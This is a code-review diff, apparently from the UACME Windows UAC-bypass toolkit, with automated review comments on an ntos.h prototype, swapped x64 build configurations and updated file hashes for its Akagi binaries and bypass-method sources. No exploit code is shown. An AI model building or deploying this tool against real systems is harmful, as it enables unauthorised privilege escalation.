_Inout_opt_ PREMOTE_PORT_VIEW ServerView,
_Out_opt_ PULONG MaxMessageLength,
_Inout_opt_ PVOID ConnectionInformation,
- _Inout_opt_ PULONG ConnectionInformationLength
-);
+ _Inout_opt_ PULONG ConnectionInformationLength);
+
+NTSTATUS NTAPI NtEnumerateBootEntries(
+ _Out_ PVOID Buffer,
+ _Inout_ PULONG BufferLength);
+
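Review bot: `NtEnumerateBootEntries` is declared with `_Out_ PVOID Buffer`, but the usual calling pattern for this routine is a first call with a NULL buffer to obtain the required size in `BufferLength`; if that is how it is intended to be used here, `_Out_opt_ PVOID Buffer,` is the accurate annotation, and the caller-side size handling should be documented on the prototype. Separately, this hunk and the two preceding ntos.h hunks (NtAcceptConnectPort through NtYieldExecution, and NtCreateMailslotFile) move the closing `);` onto the last parameter line, whereas every other prototype in this file, including the ones added earlier in this diff, keeps `);` on its own line; pick one form so the header stays uniform.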
diff --git a/Source/uacme.sln b/Source/uacme.sln
index c6c653f..9333617 100644
--- a/Source/uacme.sln
+++ b/Source/uacme.sln
@@ -112,8 +112,8 @@ Global
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32
- {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64
- {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64
+ {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = ReleaseInternal|x64
+ {3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = Release|x64
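Review bot: The changed lines map the solution's `Release|x64` to this project's `ReleaseInternal|x64` configuration, while the unchanged context line just below still maps `ReleaseInternal|x64` to `Release|x64`, so the two x64 configurations appear crossed for project {3BEF8A16-981F-4C65-8AE7-C612B46BE446}. If this is deliberate it deserves a mention in the commit description, because a reader of the solution will assume a swap; if not, the added lines should read `...Release|x64.ActiveCfg = Release|x64` and `...Release|x64.Build.0 = Release|x64` with the ReleaseInternal lines updated instead.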
diff --git a/UACME.sha256 b/UACME.sha256
index 387032a..5764dde 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,8 +1,8 @@
-a9ed36b3b02bac486e82e55ebc2f1276de8bb442457d445b39f9ca79fd1508c0 *Compiled\Akagi32.exe
-ba610693469c3034ebf9d86f570313fd67a0b9324b29d86f51ec9aef3269a3e2 *Compiled\Akagi64.exe
+46e4306bdea79c3e8269b78637bbbe510d6ee65ea18268f7788aec26b4806c41 *Compiled\Akagi32.exe
+b0e32db8c822014c282ef3aba46bac0bf934c4c3d0fcde2f3bf5f64f39789044 *Compiled\Akagi64.exe
376d63708d4e0d761f6d9224b9d5504c07b3cd5b5ae5fd40a3a3d77c4d5873d5 *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
-071fc8be1475719eca58c9dffb36e84a4c281ec77c84f82518d948d9d13d0e9a *Source\uacme.sln
+4d14153dd95bd5441763283de03afb74aa5f3fc0b68d7629be43d27e3d41c5e1 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
3fb2b94aa2ee33753fcc20fa1834be8a929a29248217cfb84a54956eeea1a824 *Source\Akagi\bin32res.h
@@ -18,7 +18,7 @@ a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\m
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-d590ad1ea548b06e8cd897742fe94f7e5aad08438baa02131ab41ef5669b7b0e *Source\Akagi\Resource.rc
+dae1ff25ab3cfa35aacd0eb1aace255ab4aa2c578d656fb81b13664d02d176e3 *Source\Akagi\Resource.rc
1cf5e1ebaf5cfb80b420fb87ff8f7d31a2b9b75dc338edb4ea6820c4beeaf36c *Source\Akagi\sup.c
37953ab7189a09fce908de75b5ce2871aaad5a04c78dca833e13318d93ece3a8 *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
@@ -43,7 +43,7 @@ c994f782c64a1a18caaab60418de573ade7e87fdc964e25557ac79eb549c7cd5 *Source\Akagi\m
d9ac1c8eedf9c9d5ed6cbf0ffeeaa13ba376760ade0d1dc6750121ed48a5b63b *Source\Akagi\methods\carberp.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
-07370a4fdfa4cc13ca49ab07bd40aff981015c79c44e1d8f30c658cb83a7ad3a *Source\Akagi\methods\enigma0x3.c
+393ba6fbfe154be58e018066bb2edcce2abb2b6bc3a209de23a279a0edde153e *Source\Akagi\methods\enigma0x3.c
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
@@ -51,8 +51,8 @@ be58d05b4f21e4cbc7a06d409c2f0002eee660d8a9017b1d103f35cdb7d9461c *Source\Akagi\m
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
5887a1083e6343ea5e6effbd0def4631fc988df14e0a4c2147d68cb70e90fcf2 *Source\Akagi\methods\hybrids.c
6327a9b8e9c19adee0d56e666756dd4a0edcc327c8ed0341f11bb80e12feaaa5 *Source\Akagi\methods\hybrids.h
-4fc2df6c52750c4f248795620ed5707dc52cc07647a63d1bffdb73ba48105f02 *Source\Akagi\methods\methods.c
-d105d38ed85bc199d62f2d185f8887b7c3fb098212ab944a835619f72add91e5 *Source\Akagi\methods\methods.h
+3155b7598ca2aad4e77a48f0351a8436c8780384820e83422bd8c2afb12a4586 *Source\Akagi\methods\methods.c
+adb791a9ef390b95f6f603c6e88c619c5031f42724843681b1562b9356d4d65a *Source\Akagi\methods\methods.h
fd7e8e20de8f3763a418368431c0b6b7131d940e7b775c165b095f78386b849b *Source\Akagi\methods\pitou.c
9754f1d2195c6d2ef6a228677d1a8fb8e92318aece0c389b3f28a87eeffe9827 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
@@ -60,8 +60,8 @@ a38afbbd8ff528662d4f61ea1f688f44778f524d18dcc08badbd182b6537d7a5 *Source\Akagi\m
629be7ba979bcf0133b6a222ac358d7c9f3b4fe2f341d284a969b1a279b7dc0e *Source\Akagi\methods\simda.c
3c3a6eb8ee56ccffedd490e87b8a2fdec7e4b09bdb2650d231f2805a27e56ade *Source\Akagi\methods\simda.h
8d95d0c5a788964202100208749ab9744180f0ea36fa222a4a3adc1d0e3f90a1 *Source\Akagi\methods\sirefef.h
-2fac6223bf4efb175c214f6a18fb235dae72b378db85a4e77cab58c6c0cba7e0 *Source\Akagi\methods\tyranid.c
-781e60e1e3e89a566b11a346ae111fb95940bdcb2565da249e1f1885ca0612f8 *Source\Akagi\methods\tyranid.h
+813c594498f7f79e160f0775a6886fff179e43416e7aa79709bd779ffde9e582 *Source\Akagi\methods\tyranid.c
+233335679cbdb8023211a848051420a7e9a02b72c0af89ff0e5eb19fc018edb4 *Source\Akagi\methods\tyranid.h
7266faf9d86af33e32023964bb666bb5fb5288586a38992f020796b75c0e9b15 *Source\Akagi\tests\test.c
b073f6d614bcdc345db660edf36784d1587e3f3ab309bfb871a0ce510faa57a6 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
@@ -83,6 +83,7 @@ a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\
1d5b354a2f9225c3e410b3fc43bf8e9984de8fff8221c9f532483d22e54ab42f *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
039659963ca2e567fe2a2c074c068a5b6ae11ce6664f319f10755f6ea4ff681b *Source\Hibiki\dllmain.c
+fc32b236825eaad7806a7cbed561f751496deace5cc0a3b72856d934c879a31a *Source\Hibiki\hibiki.suppress
1df0cd6cef001334dbe6877d8a68d34089f6a0f11dcebc7f1d08d3835d50cd8b *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
@@ -99,12 +100,12 @@ d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuch
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
-c77993138f2b53f7a5d133b3f874b615c0e255e1d165b9cb15d89c2c2aab0b16 *Source\Inazuma\main.c
+74f75ab22ee4c276633a0eafcbaa31b663b0106dd261ad4627fcdaa149a55751 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
1cae1ba300975774a60dc519d957c530bfe2443f204e28255f26af1523f56087 *Source\Naka\main.c
d96fae8d500b17819fe4426df12f68630c5178eff7006e9ea514e125592650f2 *Source\Naka\naka.suppress
-5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
+9e83a2daa3d4a17cd561676aedd0d8aef3ca4308921d3811a275055288a1c184 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
@@ -112,7 +113,7 @@ bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-31d27cc36d83e20db9ea6fbe35e395e18568403c806bb43707bd228f569dea45 *Source\Shared\ntos.h
+5d1e45dfb65548af3fa7e13792d4cca37ddbb8324e7ec1c21fd9a6d9ea49922f *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c